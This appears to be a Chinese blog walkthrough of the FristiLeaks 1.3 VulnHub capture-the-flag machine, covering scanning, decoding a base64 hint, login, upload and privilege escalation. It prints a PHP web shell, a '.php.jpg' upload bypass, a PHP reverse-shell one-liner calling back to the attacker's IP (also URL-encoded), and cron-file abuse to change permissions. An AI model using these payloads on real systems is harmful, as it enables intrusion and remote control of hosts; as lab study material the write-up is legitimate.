FristiLeaks_1.3#攻略

一、环境搭建

下载地址：FristiLeaks: 1.3 ~ VulnHub

1、这个靶机的网卡配置有点问题，我有更改root密码，更改了部分配置文件，使其可以在NAT模式下获取IP地址：

echo '' /etc/udev/rules.d/70-persistent-net.rules；删除了/etc/sysconfig/network-scripts/ifcfg-eth0的MAC和UUID行；service network restartreboot

2、kali攻击机的IP地址：10.10.10.131，网卡选择NAT模式；

二、情报收集

nmap -sP 10.10.10.0/24
nmap -sV -p1-65535 10.10.10.152

1、获取信息如下：

2、访问80端口（看看这骚气的紫蓝色）

3、目录扫描

多个工具尝试，获得robots.txt，but都是静态页面，无有效信息；

4、完了不会做了，看攻略

5、攻略说，隐藏目录在首页出现的单词中：'keep'、'calm'、'and'、'drink'、'fristi'；

看到它在嘲笑我：http://10.10.10.152/fristi/

6、sql注入、万能密码无效；查看源码获得线索；

源码中提示：

1) by eezeepz;

2) 网页中的图片经过了base64加密，但是有两段base64编码，图片只有一张；

图片1：data:img/png;base64,/9j/4AAQSkZJRgABAgAAZ......

图片2：iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAA......

- 复制编码到文件，图片1的头部“data:img/png;base64,”需要剔除；

echo "图片编码字符" > info
base64 -d info > info.png
对编码文件解码，并重定向到info.png

7、尝试登陆：user: eezeepz passwd: keKkeKKeKKeKkEkkEk；获取上传页面；

8、写码上传，此处存在解析漏洞，xxx.php.jpg文件会被系统以php解析，这边就不展示burp上传文件了，直接写码上传；

echo '<?php system($_GET[a]);phpinfo();?>' > listena.php.jpg
# 此处踩坑，必须用单引号哦~

9、上传之后反弹shell;

1）攻击机监听6666端口；

2）传递反弹shell给$a；

php -r '$sock=fsockopen("10.10.10.131",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
# 给$a传递参数的时候记得URL-Encode;--------------------------------------------------------
url?a=%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d%66%73%6f%63%6b%6f%70%65%6e%28%22%31%30%2e%31%30%2e%31%30%2e%31%33%31%22%2c%36%36%36%36%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27

3）监听成功；

三、渗透测试

1、系统版本信息&版本漏洞查询；

1）利用文件上传漏洞，上传9479.c.jpg到靶机；

在/tmp目录编译运行报错：操作不被允许；

2、遍历网站目录

1）发现/var/www/notes.txt文件，指向了eezeepz用户的家目录，内容如下：

2）发现/home/eezeepz/notes.txt文件，内容如下：

- 能访问/usr/bin/*；

- 部分/usr/bin/下没得的命令，在/home/admin，该目录只有admin用户有权限；

- /tmp/runthis文件，每分钟运行一次；

3）更改/home/admin目录权限；

echo '/home/admin/chmod 777 /home/admin' > /tmp/runthis

4）After a minute，/home/admin权限更改成功，获得两个加密文件，一个加密方式，根据cryptpass.py反向解密，结果如图所示；

5）尝试登陆fristigod；

- “Error:must be a tty”执行如下命令，调用tty接口；

python -c 'import pty;pty.spawn("/bin/bash")'

6）发现/home/fristigod/.secret_admin_stuff/doCom，可执行的二进制文件；

执行history发现作者以fristi的身份执行了ls命令，猜测可以执行高权限的命令，比如:su - 直接执行./doCom su -，提示wrong user;

至此，靶机get✔。

四、其它尝试

1）验证密码“thisisalsopw123”属于admin用户；

2）linux kernel 2.6.32-573在dirtyCow脏牛提权漏洞的范围内，但是无法在靶机进行编译；

当系统内核版本低于下图所示，dirtyCow都会对齐影响：

编译报错：

FristiLeaks_1.3#攻略相关推荐

VIM配置攻略（最强干货加强版）
自己最近也在折腾这个VIM的配置,在网上也看了很多教程等,说真的看的一头雾水.主要是对于一个初学者来说对Vundle等根本没有什么了解,也不知道怎么用,并且由于本人的Linux系统是CentOs6.5 ...
基于DCMTK的DICOM相关程序编写攻略
2008年09月10日星期三 15:35 基于DCMTK的DICOM相关程序编写攻略前言: 由于现在的医学影像设备的图像存储和传输正在逐渐向DICOM标准靠拢,在我们进行医学图像处理的过程中,经常 ...
http状态404 vscode_VS Code 调试完全攻略（5）：基于浏览器的 React 应用
每日前端夜话第344篇翻译:疯狂的技术宅作者:Charles Szilagyi 来源:charlesagile 正文共:1750 字预计阅读时间:7 分钟这次我们来研究怎样把调试器连接到用 C ...
Java - 框架之 SpringBoot 攻略day01
Spring-Boot 攻略 day01 spring-boot 一. 基本配置加运行 1. 导入配置文件(pom.xml 文件中) <parent> <groupId>org ...
AWS攻略——使用CodeBuild进行自动化构建和部署Lambda（Python）
Aws Lambda是Amazon推出的"无服务架构"服务.我们只需要简单的上传代码,做些简单的配置,便可以使用.而且它是按运行时间收费,这对于低频访问的服务来说很划算.具体的介绍 ...
AWS攻略——使用CodeBuild进行自动化构建和部署静态网页
首先声明下,使用"CodeBuild"部署并不是"正统"的方案,因为AWS提供了"CodeDeploy".如果不希望引入太多基础设施,可以考 ...
小黑盒不显示服务器,steam上买的游戏小黑盒不显示 | 手游网游页游攻略大全
发布时间:2018-04-18 贪吃蛇遇上打方块是一款最近非常热门的休闲小游戏,游戏将贪吃蛇和打方块合而为一吸引了很多玩家!但是好多小伙们都不知道该怎么玩,下面小编来教你一个快速入门的小技巧吧!~ 小 ...
一般熟练盲打需要多久_进口攻略！一般货物进口清关需要多久？如何有效提高清关效率？...
***请点击上方红色的"关注"我们,您的关注,是我们努力的动力!谢谢!*** 一.清关是什么意思? 在回答"清关一般要多久之前"我们一起来看下,就是清关是什么意 ...
64位游戏找call_《使命召唤16：战区》配置注册登录全攻略，三步让你极迅游戏!...
如果说谁是2020年最火的游戏,那么<使命召唤16:战区>绝对是排名第一.自从<使命召唤16:战区>发布之后,同时在线人数就不断刷新纪录,一天300万,3天800万 ,到现在已 ...

FristiLeaks_1.3#攻略

FristiLeaks_1.3#攻略相关推荐

最新文章

热门文章